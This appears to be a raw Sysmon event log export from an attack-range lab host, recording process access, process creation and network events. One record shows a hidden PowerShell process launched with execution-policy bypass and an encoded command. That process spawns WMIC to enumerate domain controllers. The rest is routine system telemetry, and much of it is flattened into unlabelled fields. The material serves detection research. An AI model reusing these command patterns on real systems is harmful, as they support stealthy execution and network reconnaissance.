CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

--- EventID 10 (ProcessAccess), EventRecordID 35085551, Microsoft-Windows-Sysmon/Operational, win-host-987.attackrange.local (Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000)
RuleName: -
UtcTime: 2021-09-09 18:16:13.394
SourceProcessGUID: {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId: 732  SourceThreadId: 5640
SourceImage: C:\Windows\system32\svchost.exe
TargetProcessGUID: {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId: 1820
TargetImage: C:\Windows\sysmon64.exe
GrantedAccess: 0x1400
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

--- EventID 10 (ProcessAccess), EventRecordID 35085550, Microsoft-Windows-Sysmon/Operational, win-host-987.attackrange.local (Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000)
RuleName: -
UtcTime: 2021-09-09 18:16:13.394
SourceProcessGUID: {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId: 732  SourceThreadId: 5640
SourceImage: C:\Windows\system32\svchost.exe
TargetProcessGUID: {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId: 1820
TargetImage: C:\Windows\sysmon64.exe
GrantedAccess: 0x1400
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

--- EventID 10 (ProcessAccess), EventRecordID 35085549, Microsoft-Windows-Sysmon/Operational, win-host-987.attackrange.local (Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000)
RuleName: -
UtcTime: 2021-09-09 18:16:13.394
SourceProcessGUID: {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId: 732  SourceThreadId: 5640
SourceImage: C:\Windows\system32\svchost.exe
TargetProcessGUID: {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId: 1820
TargetImage: C:\Windows\sysmon64.exe
GrantedAccess: 0x1400
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

--- EventID 10 (ProcessAccess), EventRecordID 35085548, Microsoft-Windows-Sysmon/Operational, win-host-987.attackrange.local (Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000)
RuleName: -
UtcTime: 2021-09-09 18:16:13.394
SourceProcessGUID: {B81B27B7-4130-611D-9D00-00000000C801}  SourceProcessId: 3160  SourceThreadId: 3656
SourceImage: C:\Windows\system32\csrss.exe
TargetProcessGUID: {B81B27B7-4F6D-613A-6990-03000000C801}  TargetProcessId: 2812
TargetImage: C:\Windows\System32\Wbem\WMIC.exe
GrantedAccess: 0x1fffff
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

--- EventID 10 (ProcessAccess), EventRecordID 35085547, Microsoft-Windows-Sysmon/Operational, win-host-987.attackrange.local (Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000)
RuleName: -
UtcTime: 2021-09-09 18:16:13.394
SourceProcessGUID: {B81B27B7-4822-613A-788F-03000000C801}  SourceProcessId: 6940  SourceThreadId: 4828
SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetProcessGUID: {B81B27B7-4F6D-613A-6990-03000000C801}  TargetProcessId: 2812
TargetImage: C:\Windows\System32\Wbem\WMIC.exe
GrantedAccess: 0x1fffff
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64)

--- EventID 1 (ProcessCreate), EventRecordID 35085546, Microsoft-Windows-Sysmon/Operational, win-host-987.attackrange.local (Version 5, Level 4, Task 1, Opcode 0, Keywords 0x8000000000000000)
RuleName: -
UtcTime: 2021-09-09 18:16:13.393
ProcessGuid: {B81B27B7-4F6D-613A-6990-03000000C801}  ProcessId: 2812
Image: C:\Windows\System32\wbem\WMIC.exe
FileVersion: 10.0.14393.0 (rs1_release.160715-1616)
Description: WMI Commandline Utility
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: wmic.exe
CommandLine: "C:\Windows\System32\Wbem\WMIC.exe" NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE
CurrentDirectory: C:\Users\reed_schmidt\
User: ATTACKRANGE\REED_SCHMIDT
LogonGuid: {B81B27B7-4132-611D-4F05-090000000000}  LogonId: 0x9054f  TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E
ParentProcessGuid: {B81B27B7-4822-613A-788F-03000000C801}  ParentProcessId: 6940
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell -exec bypass -Noninteractive -windowstyle hidden -e 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

--- EventID 10 (ProcessAccess), EventRecordID 35085545, Microsoft-Windows-Sysmon/Operational, win-host-987.attackrange.local (Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000)
RuleName: -
UtcTime: 2021-09-09 18:16:13.241
SourceProcessGUID: {B81B27B7-4F6D-613A-6890-03000000C801}  SourceProcessId: 3272  SourceThreadId: 5172
SourceImage: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
TargetProcessGUID: {B81B27B7-4013-611D-2700-00000000C801}  TargetProcessId: 2076
TargetImage: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
GrantedAccess: 0x101400
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

--- EventID 10 (ProcessAccess), EventRecordID 35085544, Microsoft-Windows-Sysmon/Operational, win-host-987.attackrange.local (Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000)
RuleName: -
UtcTime: 2021-09-09 18:16:13.077
SourceProcessGUID: {B81B27B7-4014-611D-3000-00000000C801}  SourceProcessId: 3144  SourceThreadId: 3164
SourceImage: C:\Windows\system32\conhost.exe
TargetProcessGUID: {B81B27B7-4F6D-613A-6890-03000000C801}  TargetProcessId: 3272
TargetImage: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
GrantedAccess: 0x1fffff
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

10341000x800000000000000035085543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:13.075{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.075{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:13.075{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.075{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:13.074{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F6D-613A-6890-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.074{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F6D-613A-6890-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.057{B81B27B7-4F6D-613A-6890-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:14.593{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F82C5A906A6FB55DDD98CA5B143FF7DA,SHA256=25B6C96BB940A1CAFF07376290AB28743AA4A91A15D6CC6A1B7E67F3C55D9128,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:14.524{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=28C625A2B09F0AA6CF8C51A99ABAAD12,SHA256=C5057ED392F3906499B55A1656BC066DB2B9D975CCEE2642F3269731D73672DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:14.078{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1483593A7373814A26727C41B71045F6,SHA256=050B81DC7C4BBF90F584871E3BFA609B9FB162C5520189172A23543D85FE9470,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:14.078{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD5B895AC67543025E79FC5EE3838257,SHA256=873E470E1708C38C244BCF25D1D71F457BD79DAA199D1027CFBCCD208E6B29FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:15.599{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED4047930415B58EA941C5D7DBC4587F,SHA256=86AD96A325F3B39C36B360E306BCB3C38ABD9BCEA20F81BC21067285B2C70060,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.472{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:3433:3933:28d1:a286:81df:ffff-58711-truea00:10e:81df:ffff:31e:b81f:1f8:ffff-53domain 354300x800000000000000035085573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:39.397{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56745-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035085572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.181{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56744-false10.0.1.12-8000- 23542300x800000000000000035085579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:16.629{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8C9131A5AE6620FCF62A757939CEA1C,SHA256=191198D0C00ED1B63E8677A7137C6A1F77C194120BB51CEB5C263FA7041BD27A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.597{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:3433:3933:28d1:a286:81df:ffff-52953-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x800000000000000035085577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.597{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:7073:809d:70b7:7bb9win-host-987.attackrange.local52953-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x800000000000000035085576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:39.472{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse10.0.1.15win-host-987.attackrange.local58711-false10.0.1.14WIN-DC-12853domain 23542300x800000000000000035085580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:17.644{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F21D976FE632464564EF7B91E331E1C4,SHA256=BCDC857AB59825363359D285E2CBBC26E4413B361FB3BD1A24A94F38FFE1E74F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:18.681{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A53F8B224883CBAD81B0D5404E834CD5,SHA256=E4E6E959510C9BA27E532166AC9320CCB8FAD702755E9A74C4A0C4EF1004412B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:19.716{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2959BA76085E8688332D1ADC3A1C87E2,SHA256=6C37598E2D1BC2E4CDF979BDE7D4DD570A26A30DC1EBF6541A92A4B79ECB4C2E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
